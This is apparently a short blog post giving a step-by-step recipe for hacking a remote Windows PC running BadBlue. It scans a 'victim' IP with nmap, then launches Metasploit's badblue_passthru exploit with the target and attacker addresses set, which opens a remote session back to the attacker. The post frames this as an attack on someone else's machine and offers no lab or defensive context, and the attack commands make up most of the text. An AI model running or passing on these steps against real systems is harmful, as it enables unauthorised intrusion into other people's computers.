Hack Remote Windows PC using BadBlue Exploit

BadBlue is software which can use for photos, videos, music, and business files with friends and colleagues instantly.


First scan badblue service the victim pc using nmap –sV 192.168.1.2


Open Kali terminal type msfconsole


Now type use exploit/windows/http/badblue_passthru
msf exploit (badblue_passthru)>set rhost 192.168.1.2 (Victim IP)
msf exploit (badblue_passthru)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (badblue_passthru)>exploit  

0 comments:

Post a Comment